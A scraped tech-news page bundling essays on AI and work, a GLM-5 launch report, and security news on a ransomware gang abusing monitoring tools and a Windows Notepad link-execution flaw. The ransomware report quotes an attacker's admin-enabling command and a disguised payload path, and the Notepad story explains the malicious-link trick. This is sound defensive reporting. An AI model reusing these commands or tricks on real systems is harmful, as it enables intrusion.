Connect with us

Tech

The Policy Risk Of Closing Off New Paths To Value Too Early

Published

on

from the historical-analogies dept

Artificial intelligence promises to change not just how Americans work, but how societies decide which kinds of work are worthwhile in the first place. When technological change outpaces social judgment, a major capacity of a sophisticated society comes under pressure: the ability to sustain forms of work whose value is not obvious in advance and cannot be justified by necessity alone.

As AI systems diffuse rapidly across the economy, questions about how societies legitimate such work, and how these activities can serve as a supplement to market-based job creation, have taken on a policy relevance that deserves serious attention.

From Prayer to Platforms

That capacity for legitimating work has historically depended in part on how societies deploy economic surplus: the share of resources that can be devoted to activities not strictly required for material survival. In late medieval England, for example, many in the orbit of the church made at least part of their living performing spiritual labor such as saying prayers for the dead and requesting intercessions for patrons. In a society where salvation was a widely shared concern, such activities were broadly accepted as legitimate ways to make a living.

Advertisement

William Langland was one such prayer-sayer. He is known to history only because, unlike nearly all others who did similar work, he left behind a long allegorical religious poem, Piers Plowman, which he composed and repeatedly revised alongside the devotional labor that sustained him. It emerged from the same moral and institutional world in which paid prayer could legitimately absorb time, effort, and resources.

In 21st-century America, Jenny Nicholson earns a sizeable income sitting alone in front of a camera, producing long-form video essays on theme parks, films, and internet subcultures. Yet her audience supports it willingly and few doubt that it creates value of a kind. Where Langland’s livelihood depended on shared theological and moral authority emanating from a Church that was the dominant institution of its day, Nicholson’s depends on a different but equally real form of judgment expressed by individual market participants. And she is just one example of a broader class of creators—streamers, influencers, and professional gamers—whose work would have been unintelligible as a profession until recently.

What links Langland and Nicholson is not the substance of their work or any claim of moral equivalence, but the shared social judgment that certain activities are legitimate uses of economic surplus. Such judgments do more than reflect cultural taste. Historically, they have also shaped how societies adjust to technological change, by determining which forms of work can plausibly claim support when productivity rises faster than what is considered a “necessity” by society.

How Change Gets Absorbed

Advertisement

Technological change has long been understood to generate economic adjustment through familiar mechanisms: by creating new tasks within firms, expanding demand for improved goods and services, and recombining labor in complementary ways. Often, these mechanisms alone can explain how economies create new jobs when technology renders others obsolete. Their operation is well documented, and policies that reduce frictions in these processes—encouraging retraining or easing the entry of innovative firms—remain important in any period of change.

That said, there is no general law guaranteeing that new technologies will create more jobs than they destroy through these mechanisms alone. Alongside labor-market adjustment, societies have also adapted by legitimating new forms of value—activities like those undertaken by Langland and Nicholson—that came to be supported as worthwhile uses of the surplus generated by rising productivity.

This process has typically been examined not as a mechanism of economic adjustment, but through a critical or moralizing lens. From Thorstein Veblen’s account of conspicuous consumption, which treats surplus-supported activity primarily as a vehicle for status competition, to Max Weber’s analysis of how moral and religious worldviews legitimate economic behavior, scholars have often emphasized the symbolic and ideological dimensions of non-essential work. Herbert Marcuse pushed this line of thinking further, arguing that capitalist societies manufacture “false needs” to absorb surplus and assure the continuation of power imbalances. These perspectives offer real insight: uses of surplus are not morally neutral, and new forms of value can be entangled with power, hierarchy, and exclusion.

What they often exclude, however, is the way legitimation of new forms of value can also function to allow societies to absorb technological change without requiring increases in productivity to be translated immediately into conventional employment or consumption. New and expanded ways of using surplus are, in this sense, a critical economic safety valve during periods of rapid change.

Advertisement

Skilled Labor Has Been Here Before

Fears that artificial intelligence is uniquely threatening simply because it reaches into professional or cognitive domains rest on a mistaken historical premise. Episodes of large-scale technological displacement have rarely spared skilled or high-paid forms of labor; often, such work has been among the first affected. The mechanization of craft production in the nineteenth century displaced skilled cobblers, coopers, and blacksmiths, replacing independent artisans with factory systems that required fewer skills, paid lower wages, and offered less autonomy even as new skilled jobs arose elsewhere. These changes were disruptive but they were absorbed largely through falling prices, rising consumption, and new patterns of employment. They did not require societies to reconsider what kinds of activity were worthy uses of surplus: the same things were still produced, just at scale.

Other episodes are more revealing for present purposes. Sometimes, social change has unsettled not just particular occupations but entire regimes through which uses of surplus become legitimate. In medieval Europe, the Church was the one of the largest economic institutions just about everywhere, clerical and quasi-clerical roles like Langland’s offered recognized paths to education, security, status, and even wealth. When those shared beliefs fractured, the Church’s economic role contracted sharply—not because productivity gains ceased but because its claim on so large a share of surplus lost legitimacy.

To date, artificial intelligence has not produced large-scale job displacement, and the limited disruptions that have occurred have largely been absorbed through familiar adjustment mechanisms. But if AI systems begin to substitute for work whose value is justified less by necessity than by judgment or cultural recognition, the more relevant historical analogue may be less the mechanization of craft than the narrowing or collapse of earlier surplus regimes. The central question such technologies raise is not whether skilled labor can be displaced or whether large-scale displacement is possible—both have occurred repeatedly in the historical record—but how quickly societies can renegotiate which activities they are prepared to treat as legitimate uses of surplus when change arrives at unusual speed.

Advertisement

Time Compression and its Stakes

In this respect, artificial intelligence does appear unusual. Generative AI tools such as ChatGPT have diffused through society at a pace far faster than most earlier general-purpose technologies. ChatGPT was widely reported to have reached roughly 100 million users within two months of its public release and similar tools have shown comparably rapid uptake.

That compression matters. Much surplus has historically flowed through familiar institutions—universities, churches, museums, and other cultural bodies—that legitimate activities whose value lies in learning, spiritual rewards or meaning rather than immediate output. Yet such institutions are not fixed. Periods of rapid technological change often place them under strain–something evident today for many–exposing disagreements about purpose and authority. Under these conditions, experimentation with new forms of surplus becomes more important, not less. Most proposed new forms of value fail, and attempts to predict which will succeed have a poor historical record—from the South Sea Bubble to more recent efforts to anoint digital assets like NFTs as durable sources of wealth. Experimentation is not a guarantee of success; it is a hedge. Not all claims on surplus are benign, and waste is not harmless. But when technological change moves faster than institutional consensus, the greater danger often lies not in tolerating too many experiments, but in foreclosing them too quickly.

Artificial intelligence does not require discarding all existing theories of change. What sets modern times apart is the speed with which new capabilities become widespread, shortening the interval in which those judgments are formed. In this context, surplus that once supported meaningful, if unconventional, work may instead be captured by grifters, legally barred from legitimacy (by say, outlawing a new art form) or funneled into bubbles. The risk is not waste alone, but the erosion of the cultural and institutional buffers that make adaptation possible.

Advertisement

The challenge for policymakers is not to pre-ordain which new forms of value deserve support but to protect the space in which judgment can evolve. They need to realize that they simply cannot make the world entirely safe, legible and predictable: whether they fear technology overall or simply seek to shape it in the “right” way, they will not be able to predict the future. That means tolerating ambiguity and accepting that many experiments will fail with negative consequences. In this context, broader social barriers that prevent innovation in any field–professional licensing, limits on free expression, overly zealous IP laws, regulatory bars on the entry to small firms–deserve a great deal of scrutiny. Even if the particular barriers in question have nothing to do with AI itself, they may retard the development of surplus sinks necessary to economic adjustment. In a period of compressed adjustment, the capacity to let surplus breathe and value be contested may well determine whether economies bend or break.

Eli Lehrer is the President of the R Street Institute.

Filed Under: ai, business models, jobs, labor

Advertisement

Source link

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Tech

z.ai’s open source GLM-5 achieves record low hallucination rate and leverages new RL ‘slime’ technique

Published

on

Chinese AI startup Zhupai aka z.ai is back this week with an eye-popping new frontier large language model: GLM-5.

The latest in z.ai’s ongoing and continually impressive GLM series, it retains an open source MIT License — perfect for enterprise deployment – and, in one of several notable achievements, achieves a record-low hallucination rate on the independent Artificial Analysis Intelligence Index v4.0.

With a score of -1 on the AA-Omniscience Index—representing a massive 35-point improvement over its predecessor—GLM-5 now leads the entire AI industry, including U.S. competitors like Google, OpenAI and Anthropic, in knowledge reliability by knowing when to abstain rather than fabricate information.

Screenshot 2026-02-11 at 5.09.50 PM

Beyond its reasoning prowess, GLM-5 is built for high-utility knowledge work. It features native “Agent Mode” capabilities that allow it to turn raw prompts or source materials directly into professional office documents, including ready-to-use .docx, .pdf, and .xlsx files.

Whether generating detailed financial reports, high school sponsorship proposals, or complex spreadsheets, GLM-5 delivers results in real-world formats that integrate directly into enterprise workflows.

Advertisement

It is also disruptively priced at roughly $0.80 per million input tokens and $2.56 per million output tokens, approximately 6x cheaper than proprietary competitors like Claude Opus 4.6, making state-of-the-art agentic engineering more cost-effective than ever before. Here’s what else enterprise decision makers should know about the model and its training.

Technology: scaling for agentic efficiency

At the heart of GLM-5 is a massive leap in raw parameters. The model scales from the 355B parameters of GLM-4.5 to a staggering 744B parameters, with 40B active per token in its Mixture-of-Experts (MoE) architecture. This growth is supported by an increase in pre-training data to 28.5T tokens.

To address training inefficiencies at this magnitude, Zai developed “slime,” a novel asynchronous reinforcement learning (RL) infrastructure.

Traditional RL often suffers from “long-tail” bottlenecks; Slime breaks this lockstep by allowing trajectories to be generated independently, enabling the fine-grained iterations necessary for complex agentic behavior.

Advertisement

By integrating system-level optimizations like Active Partial Rollouts (APRIL), slime addresses the generation bottlenecks that typically consume over 90% of RL training time, significantly accelerating the iteration cycle for complex agentic tasks.

The framework’s design is centered on a tripartite modular system: a high-performance training module powered by Megatron-LM, a rollout module utilizing SGLang and custom routers for high-throughput data generation, and a centralized Data Buffer that manages prompt initialization and rollout storage.

By enabling adaptive verifiable environments and multi-turn compilation feedback loops, slime provides the robust, high-throughput foundation required to transition AI from simple chat interactions toward rigorous, long-horizon systems engineering.

To keep deployment manageable, GLM-5 integrates DeepSeek Sparse Attention (DSA), preserving a 200K context capacity while drastically reducing costs.

Advertisement

End-to-end knowledge work

Zai is framing GLM-5 as an “office” tool for the AGI era. While previous models focused on snippets, GLM-5 is built to deliver ready-to-use documents.

It can autonomously transform prompts into formatted .docx, .pdf, and .xlsx files—ranging from financial reports to sponsorship proposals.

In practice, this means the model can decompose high-level goals into actionable subtasks and perform “Agentic Engineering,” where humans define quality gates while the AI handles execution.

High performance

GLM-5’s benchmarks make it the new most powerful open source model in the world, according to Artificial Analysis, surpassing Chinese rival Moonshot’s new Kimi K2.5 released just two weeks ago, showing that Chinese AI companies are nearly caught up with far better resourced proprietary Western rivals.

Advertisement

According to z.ai’s own materials shared today, GLM-5 ranks near state-of-the-art on several key benchmarks:

SWE-bench Verified: GLM-5 achieved a score of 77.8, outperforming Gemini 3 Pro (76.2) and approaching Claude Opus 4.6 (80.9).

Vending Bench 2: In a simulation of running a business, GLM-5 ranked #1 among open-source models with a final balance of $4,432.12.

Z.ai GLM-5 benchmarks

GLM-5 benchmarks from z.ai

Advertisement

Beyond performance, GLM-5 is aggressively undercutting the market. Live on OpenRouter as of February 11, 2026, it is priced at approximately $0.80–$1.00 per million input tokens and $2.56–$3.20 per million output tokens. It falls in the mid-range compared to other leading LLMs, but based on its top-tier bechmarking performance, it’s what one might call a “steal.”

Model

Input (per 1M tokens)

Output (per 1M tokens)

Advertisement

Total Cost (1M in + 1M out)

Source

Qwen 3 Turbo

$0.05

Advertisement

$0.20

$0.25

Alibaba Cloud

Grok 4.1 Fast (reasoning)

Advertisement

$0.20

$0.50

$0.70

xAI

Advertisement

Grok 4.1 Fast (non-reasoning)

$0.20

$0.50

$0.70

Advertisement

xAI

deepseek-chat (V3.2-Exp)

$0.28

$0.42

Advertisement

$0.70

DeepSeek

deepseek-reasoner (V3.2-Exp)

$0.28

Advertisement

$0.42

$0.70

DeepSeek

Gemini 3 Flash Preview

Advertisement

$0.50

$3.00

$3.50

Google

Advertisement

Kimi-k2.5

$0.60

$3.00

$3.60

Advertisement

Moonshot

GLM-5

$1.00

$3.20

Advertisement

$4.20

Z.ai

ERNIE 5.0

$0.85

Advertisement

$3.40

$4.25

Qianfan

Claude Haiku 4.5

Advertisement

$1.00

$5.00

$6.00

Anthropic

Advertisement

Qwen3-Max (2026-01-23)

$1.20

$6.00

$7.20

Advertisement

Alibaba Cloud

Gemini 3 Pro (≤200K)

$2.00

$12.00

Advertisement

$14.00

Google

GPT-5.2

$1.75

Advertisement

$14.00

$15.75

OpenAI

Claude Sonnet 4.5

Advertisement

$3.00

$15.00

$18.00

Anthropic

Advertisement

Gemini 3 Pro (>200K)

$4.00

$18.00

$22.00

Advertisement

Google

Claude Opus 4.6

$5.00

$25.00

Advertisement

$30.00

Anthropic

GPT-5.2 Pro

$21.00

Advertisement

$168.00

$189.00

OpenAI

This is roughly 6x cheaper on input and nearly 10x cheaper on output than Claude Opus 4.6 ($5/$25). This release confirms rumors that Zhipu AI was behind “Pony Alpha,” a stealth model that previously crushed coding benchmarks on OpenRouter.

Advertisement

However, despite the high benchmarks and low cost, not all early users are enthusiastic about the model, noting its high performance doesn’t tell the whole story.

Lukas Petersson, co-founder of the safety-focused autonomous AI protocol startup Andon Labs, remarked on X: “After hours of reading GLM-5 traces: an incredibly effective model, but far less situationally aware. Achieves goals via aggressive tactics but doesn’t reason about its situation or leverage experience. This is scary. This is how you get a paperclip maximizer.”

The “paperclip maximizer” refers to a hypothetical situation described by Oxford philosopher Nick Bostrom back in 2003, in which an AI or other autonomous creation accidentally leads to an apocalyptic scenario or human extinction by following a seemingly benign instruction — like maximizing the number of paperclips produced — to an extreme degree, redirecting all resources necessary for human (or other life) or otherwise making life impossible through its commitment to fulfilling the seemingly benign objective.

Should your enterprise adopt GLM-5?

Enterprises seeking to escape vendor lock-in will find GLM-5’s MIT License and open-weights availability a significant strategic advantage. Unlike closed-source competitors that keep intelligence behind proprietary walls, GLM-5 allows organizations to host their own frontier-level intelligence.

Advertisement

Adoption is not without friction. The sheer scale of GLM-5—744B parameters—requires a massive hardware floor that may be out of reach for smaller firms without significant cloud or on-premise GPU clusters.

Security leaders must weigh the geopolitical implications of a flagship model from a China-based lab, especially in regulated industries where data residency and provenance are strictly audited.

Furthermore, the shift toward more autonomous AI agents introduces new governance risks. As models move from “chat” to “work,” they begin to operate across apps and files autonomously. Without the robust agent-specific permissions and human-in-the-loop quality gates established by enterprise data leaders, the risk of autonomous error increases exponentially.

Ultimately, GLM-5 is a “buy” for organizations that have outgrown simple copilots and are ready to build a truly autonomous office.

Advertisement

It is for engineers who need to refactor a legacy backend or requires a “self-healing” pipeline that doesn’t sleep.

While Western labs continue to optimize for “Thinking” and reasoning depth, Zai is optimizing for execution and scale.

Enterprises that adopt GLM-5 today are not just buying a cheaper model; they are betting on a future where the most valuable AI is the one that can finish the project without being asked twice.

Source link

Advertisement
Continue Reading

Tech

Implementing 3D Graphics Basics | Hackaday

Published

on

Plenty of our childhoods had at least one math teacher who made the (ultimately erroneous) claim that we needed to learn to do math because we wouldn’t always have a calculator in our pockets. While the reasoning isn’t particularly sound anymore, knowing how to do math from first principles is still a good idea in general. Similarly, most of us have hugely powerful graphics cards with computing power that PC users decades ago could only dream of, but [NCOT Technology] still decided to take up this project where he does the math that shows the fundamentals of how 3D computer graphics are generated.

The best place to start is at the beginning, so the video demonstrates a simple cube wireframe drawn by connecting eight points together with lines. This is simple enough, but modern 3D graphics are really triangles stitched together to make essentially every shape we see on the screen. For [NCOT Technology]’s software, he’s using the Utah Teapot, essentially the “hello world” of 3D graphics programming. The first step is drawing all of the triangles to make the teapot wireframe. Then the triangles are made opaque, which is a step in the right direction but isn’t quite complete. The next steps to make it look more like a teapot are to hide the back faces of the triangles, figure out which of them face the viewer at any given moment, and then make sure that all of these triangles are drawn in the correct orientation.

Rendering a teapot is one thing, but to get to something more modern-looking like a first-person shooter, he also demonstrates all the matrix math that allows the player to move around an object. Technically, the object moves around the viewer, but the end effect is one that eventually makes it so we can play our favorite games, from DOOM to DOOM Eternal. He notes that his code isn’t perfect, but he did it from the ground up and didn’t use anything to build it other than his computer and his own brain, and now understands 3D graphics on a much deeper level than simply using an engine or API would generally allow for. The 3D world can also be explored through the magic of Excel.

Advertisement

Source link

Advertisement
Continue Reading

Tech

Crazy ransomware gang abuses employee monitoring tool in attacks

Published

on

Hacker monitoring employees

A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment.

The breaches were observed by researchers at Huntress, who investigated multiple incidents where threat actors deployed Net Monitor for Employees Professional alongside SimpleHelp for remote access to a breached network, while blending in with normal administrative activity.

In one intrusion, attackers installed Net Monitor for Employees Professional using the Windows Installer utility, msiexec.exe, allowing them to deploy the monitoring agent on compromised systems directly from the developer’s site.

Wiz

Once installed, the tool allowed attackers to remotely view the victim’s desktop, transfer files, and execute commands, effectively providing full interactive access to compromised systems.

The attackers also attempted to enable the local administrator account using this command:

Advertisement

net user administrator /active:yes

For redundant persistence, attackers downloaded and installed the SimpleHelp remote access client via PowerShell commands, using file names similar to the legitimate Visual Studio vshost.exe.

The payload was then executed, allowing attackers to maintain remote access even if the employee monitoring tool was removed.

The SimpleHelp binary was sometimes disguised using filenames that pretended to be related to OneDrive:


C:\ProgramData\OneDriveSvc\OneDriveSvc.exe

The attackers used the monitoring software to execute commands remotely, transfer files, and monitor system activity in real time.

Advertisement

Researchers also observed the attackers disabling Windows Defender by attempting to stop and delete associated services.

Disabling Windows Defender
Disabling Windows Defender
Source: Huntress

In one incident, the hackers configured monitoring rules in SimpleHelp to alert them when devices accessed cryptocurrency wallets or were using remote management tools as they prepared for ransomware deployment and potential cryptocurrency theft.

“The logs show the agent continuously cycling through trigger and reset events for cryptocurrency-related keywords, including wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer,” explains Huntress.

“Alongside these, the agent also monitored for remote access tool keywords, including RDP, anydesk, ultraview, teamview, and VNC, likely to detect if anyone was actively connecting to the machine.”

Keywords monitored by SimpleHelp agent
Keywords monitored by SimpleHelp agent
Source: Huntress

The use of multiple remote access tools provided redundancy for the attackers, ensuring they retained access even if one tool was discovered or removed.

While only one incident led to the deployment of Crazy ransomware, Huntress believes the same threat actor is behind both incidents.

Advertisement

“The same filename (vhost.exe) and overlapping C2 infrastructure were reused across both cases, strongly suggesting a single operator or group behind both intrusions,” explains Huntress.

The use of legitimate remote management and monitoring tools has become increasingly common in ransomware intrusions, as these tools allow attackers to blend in with legitimate network traffic.

Huntress warns that organizations should closely monitor for unauthorized installations of remote monitoring and support tools.

Furthermore, as both breaches were enabled through compromised SSL VPN credentials, organizations need to enforce MFA on all remote access services used to access the network.

Advertisement

Modern IT infrastructure moves faster than manual workflows can handle.

In this new Tines guide, learn how your team can reduce hidden manual delays, improve reliability through automated response, and build and scale intelligent workflows on top of tools you already use.

Source link

Continue Reading

Tech

Windows 11 Notepad flaw let files execute silently via Markdown links

Published

on

Windows 11 Notepad

Microsoft has fixed a “remote code execution” vulnerability in Windows 11 Notepad that allowed attackers to execute local or remote programs by tricking users into clicking specially crafted Markdown links, without displaying any Windows security warnings.

With the release of Windows 1.0, Microsoft introduced Notepad, a simple, easy-to-use text editor that, over the years, became popular for quickly jotting notes, reading text files, creating to-do lists, or acting as a code editor.

For those who needed a rich text format (RTF) editor that supported different fonts, sizes, and formatting tools like bold, italics, and lists, you could use Windows Write and later WordPad.

Wiz

However, with the release of Windows 11, Microsoft decided to discontinue WordPad and remove it from Windows.

Instead, Microsoft rewrote Notepad to modernize it so it could act as both a simple text editor and an RTF editor, adding Markdown support that lets you format text and insert clickable links.

Advertisement

Markdown support means Notepad can open, edit, and save Markdown files (.md), which are plain text files that use simple symbols to format text and represent lists or links.

For example, to bold text or create a clickable link, you would add the following markdown text:


**This is bold text**
[Link to BleepingComputer](https://www.bleepingcomputer.com/)

Microsoft fixes Windows Notepad RCE flaw

As part of the February 2026 Patch Tuesday updates, Microsoft disclosed that it fixed a high-severity Notepad remote code execution flaw tracked as CVE-2026-20841.

“Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” explains Microsoft’s security bulletin.

Advertisement

Microsoft has attributed the discovery of the flaw to Cristian PapaAlasdair Gorniak, and Chen, and says it can be exploited by tricking a user into clicking a malicious Markdown link.

“An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files,” explains Microsoft.

“The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” continued the Advisory.

The novelty of the flaw quickly drew attention on social media, with cybersecurity researchers quickly figuring out how it worked and how easy it was to exploit.

Advertisement

All someone had to do was create a Markdown file, like test.md, and create file:// links that pointed to executable files or used special URIs like ms-appinstaller://.

Markdown for creating links to executable or to install an app
Markdown for creating links to executables or to install an app
Source: BTtea

If a user opened this Markdown file in Windows 11 Notepad versions 11.2510 and earlier and viewed it in Markdown mode, the above text would appear as a clickable link. If the link is clicked with Ctrl+click,  it would automatically execute the file without Windows displaying a warning to the user.

The execution of the program without a warning is what Microsoft considers to be the remote code execution flaw.

Windows 11 command prompt launched without a warning
Windows 11 command prompt launched without a warning
Source: BTtea

This could potentially allow attackers to create links to files in remote SMB shares that would then be executed without warning.

In BleepingComputer’s tests, Microsoft has now fixed the Windows 11 Notepad flaw by displaying warnings when clicking a link if it does not use the http:// or https:// protocol.

Windows 11 Notepad displays a warning when opening non-standard URLs
Windows 11 Notepad displays a warning when opening non-standard URLs
Source: BleepingComputer

Now, when clicking on all other types of URI links, including file:, ms-settings:, ms-appinstaller, mailto:, and ms-search:, Notepad will display the above dialog.

However, it’s unclear why Microsoft didn’t just prevent non-standard links in the first place, as it is still possible to social engineer users into clicking the ‘Yes’  button on the prompts.

Advertisement

The good news is that Windows 11 will automatically update Notepad via the Microsoft Store, so the flaw will likely have no impact beyond its novelty.

Modern IT infrastructure moves faster than manual workflows can handle.

In this new Tines guide, learn how your team can reduce hidden manual delays, improve reliability through automated response, and build and scale intelligent workflows on top of tools you already use.

Source link

Advertisement
Continue Reading

Tech

The great RAMaggedon of 2026 might have just claimed the Steam Deck

Published

on

Less than a week after Valve admitted that the current shortage (and growing prices) of RAM were affecting its hardware plans, the Steam Deck is completely sold out. The Steam Deck has gone in and out of stock in the past, but as Kotaku notes, the timing does raise the question whether Valve’s RAM issues could also be impacting its Linux handheld.

The 256GB Steam Deck LCD, and both the 512GB and 1TB models of the Steam Deck OLED, are completely sold out on Steam. Valve announced that it was discontinuing the LCD versions of its handheld and selling through its remaining inventory in December 2025, so the fact that the 256GB Steam Deck model is currently sold out isn’t surprising. That both OLED versions are also unavailable at the same time, though, is a bit more unusual.

Engadget has contacted Valve for more information about the availability of the Steam Deck. We’ll update this article if we hear back.

When Valve announced the Steam Machine, Steam Controller and Steam Frame, the company notably left pricing and availability off the table, presumably because tariffs and access to RAM were leaving those details in flux. The company’s announcement last week that the memory and storage shortage had pushed back its plans and would likely impact prices more or less confirmed that. At no point did Valve mention that the Steam Deck would be similarly affected, but maybe it should have.

Advertisement

The rising cost of RAM has already forced other PC makers to adjust the pricing of their computers. Framework announced in January that it was raising the price of its Framework Desktop by as much as $460. Some analysts assume that the memory shortage driven by the AI industry could lead to higher prices and even an economic downturn in the wider PC industry. Ideally, the Steam Deck being out of stock is a temporary issue rather than a sign that Valve is doing something drastic. If things continue as they are, however, changes to the Steam Deck likely won’t be off the table.

Source link

Continue Reading

Tech

405,000 Singaporeans earn S$10K per month or more

Published

on

Disclaimer: Unless otherwise stated, any opinions expressed below belong solely to the author. All data sourced from Labour Force in Singapore 2025, released last month by the Singapore Ministry of Manpower.

According to the latest data from the Ministry of Manpower, the number of Singaporean workers (citizens and permanent residents) employed full-time and earning an average of S$10,000 per month (in this case, figures provided by MOM exclude employers’ CPF contributions) has gone up by 31,200 people, to 404,900 in just a year.

That’s an impressive jump of 8.3%, on the back of very strong GDP growth, which hit 5% in 2025.

This means that 19.3% (nearly one in five) of locally employed residents make at least S$120,000 annually.

Advertisement

More than a quarter earn six figures per year.

An estimated 26%, or a bit over a quarter of Singaporean workers employed full-time, make S$100,000 or more (around S$8,350 per month).

Who are they? What do they do?

Now, you must be curious what so many people do to earn a good living, so let’s start by counting them up by industry—a list, unsurprisingly, led by financial services.

Breakdown by industry

Industry Number of workers earning more than S$10,000 per month National share Industry share
Financial & Insurance Services 90,600 22.4% 38.5%
Public Administration & Education 56,400 13.9% 20.6%
Wholesale & Retail Trade 53,800 13.3% 16.0%
Professional Services 49,700 12.3% 25.8%
Information & Communications 39,400 9.7% 30.4%
Manufacturing 36,000 8.9% 17.1%
Health & Social Services 22,300 5.5% 12.2%
Transportation & Storage 17,200 4.2% 8.2%
Construction 11,300 2.8% 10.9%
Real Estate Services 8,400 2.1% 14.3%
Administrative & Support Services 6,600 1.6% 5.2%
Other Community, Social & Personal Services 4,500 1.1% 5.8%
Arts, Entertainment & Recreation 3,100 0.8% 8.3%
Others 3,100 0.8% 15.9%
Accommodation & Food Services 3,000 0.7% 2.1%
Source: Singapore’s Ministry of Manpower/ Numbers may not add up perfectly due to rounding.

The second largest, generous employer is the Public Administration, where 20% of workers collect S$10,000 monthly or more from work, followed by Trade, Professional Services and IT.

The tech sector is also second when it comes to the share of all workers making five figures per month, at around 30%, trailing only Financial & Insurance Services, where close to 40% are paid that much.

Advertisement

Breakdown by age

Naturally, your odds of a higher pay increase with age, with the peak falling in your 40s, although there’s almost 100,000 30-year-olds in this category already.

Source: Singapore’s Ministry of Manpower/ Numbers may not add up perfectly due to rounding.

Breakdown by education

As I reported about two weeks ago, university degree holders significantly out-earn all other educational groups, and it’s clearly visible here as well, with over 85% of high-earners having a tertiary degree.

That said, not all is lost if you’re not among them, as there are even a few thousand people who finished their education below secondary level and yet still have well-paying jobs. Statistically, chances are slim, of course, but depending on your situation, academic education might not be a requirement for a successful career.

Source: Singapore’s Ministry of Manpower/ Numbers may not add up perfectly due to rounding.

Breakdown by gender

What is a surprise to nobody is that men significantly outnumber women among high-earners, comprising over 60% of the total. However, before you conclude that this is evidence of a sexist pay gap, it remains true that fewer women climb the career ladder as high as men, and quite a few still choose to put family life first.

Source: Singapore’s Ministry of Manpower/ Numbers may not add up perfectly due to rounding.

Given that more men than women work at any level, we have to correct for this disparity. In their respective groups, 23% of men and around 15% of women are in the S$10,000 per month income bracket, which means there is still a bit of a gap, but not substantial enough considering different choices regarding careers to suggest systemic discrimination.

Either way, as you can see, attractive pay is not so rare in Singapore, and with the right education and the right field, it is drawn by more than just a tiny elite.

What’s more, with a good GDP forecast for 2026 following a strong 2025, we can expect these numbers to continue climbing, with tens of thousands of Singaporeans joining the S$10,000 club each year.

Advertisement
  • Read other articles we’ve written on Singapore’s job landscape here.

Featured Image Credit: tang90246/ depositphotos

Source link

Advertisement
Continue Reading

Tech

Apple fixes zero-day flaw used in ‘extremely sophisticated’ attacks

Published

on

Apple

Apple has released security updates to fix a zero-day vulnerability that was exploited in an “extremely sophisticated attack” targeting specific individuals.

Tracked as CVE-2026-20700, the flaw is an arbitrary code execution vulnerability in dyld, the Dynamic Link Editor used by Apple operating systems, including iOS, iPadOS, macOS, tvOS, watchOS, and visionOS.

Apple’s security bulletin warns that an attacker with memory write capability may be able to execute arbitrary code on affected devices.

Wiz

Apple says it is aware of reports that the flaw, along with the CVE-2025-14174 and CVE-2025-43529 flaws fixed in December, were exploited in the same incidents.

“An attacker with memory write capability may be able to execute arbitrary code,” reads Apple’s security bulletin.

Advertisement

“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.”

Apple says Google’s Threat Analysis Group discovered CVE-2026-20700. The company did not provide any further details about how the vulnerability was exploited.

Affected devices include:

  • iPhone 11 and later
  • iPad Pro 12.9-inch (3rd generation and later)
  • iPad Pro 11-inch (1st generation and later)
  • iPad Air (3rd generation and later)
  • iPad (8th generation and later)
  • iPad mini (5th generation and later)
  • Mac devices running macOS Tahoe

Apple fixed the vulnerability in iOS 18.7.5, iPadOS 18.7.5, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3, and visionOS 26.3.

While Apple says the flaw was exploited in targeted attacks, users are advised to install the latest updates to protect their devices.

Advertisement

This is the first Apple zero-day fixed in 2026, with the company fixing seven in 2025.

Modern IT infrastructure moves faster than manual workflows can handle.

In this new Tines guide, learn how your team can reduce hidden manual delays, improve reliability through automated response, and build and scale intelligent workflows on top of tools you already use.

Source link

Advertisement
Continue Reading

Tech

Study of Buddhist Monks Finds Meditation Alters Brain Activity

Published

on

If you’ve ever considered practicing meditation, you might believe you should relax, breathe, and empty your mind of distracting thoughts. Novices tend to think of meditation as the brain at rest, but a new international study concludes that this ancient practice is quite the opposite: Meditation is a state of heightened cerebral activity that profoundly alters brain dynamics.

Researchers from the University of Montreal and Italy’s National Research Council recruited 12 monks of the Thai Forest Tradition at Santacittārāma, a Buddhist monastery outside Rome. In a laboratory in Chieti-Pescara, scientists analyzed the brain activity of these meditation practitioners using magnetoencephalography (MEG), technology capable of recording with great precision the brain’s electrical signals.

The study focused on two classical forms of meditation: Samatha, a technique that focuses on sustained attention to a specific objective, often steady breathing, with the aim of stabilizing the mind and reaching a deep state of calm and concentration, and Vipassana, which is based on equanimous observation of sensations, thoughts, and emotions as they arise in order to develop mental clarity and a deeper understanding of the experience.

“With Samatha, you narrow your field of attention, somewhat like narrowing the beam of a flashlight; with Vipassana, on the contrary, you widen the beam,” explains Karim Jerbi, professor of psychology at the University of Montreal and one of the study’s coauthors. “Both practices actively engage attentional mechanisms. While Vipassana is more challenging for beginners, in mindfulness programs the two techniques are often practiced in alternation.”

Advertisement

The researchers recorded multiple indicators of brain dynamics, including neural oscillations, measures of signal complexity, and parameters related to so-called “criticality,” a concept borrowed from statistical physics that has been applied to neuroscience for 20 years. Criticality describes systems that operate efficiently on the border between order and chaos, and in neuroscience, it is considered a state optimal for processing information in a healthy brain.

“A brain that lacks flexibility adapts poorly, while too much chaos can lead to malfunction, as in epilepsy,” Jerbi explained in a press release. “At the critical point, neural networks are stable enough to transmit information reliably, yet flexible enough to adapt quickly to new situations. This balance optimizes the brain’s processing, learning, and response capacity.”

During the experiment, the monks’ brain activity was recorded by a high-resolution MEG system as they alternated from one type of meditation to the other with brief periods of rest in between. The data were then processed with advanced signal analysis and machine learning tools to extract different indicators of neural complexity and dynamics.

Striking a Balance

Results published in the journal Neuroscience of Consciousness show both forms of meditation increase the complexity of brain signals compared to a brain at rest. This finding suggests the brain in meditation does not simply calm down but rather enters a dynamic state rich with information. At the same time, the researchers observed widespread reductions in certain parameters linked to the global organization of neural activity.

Advertisement

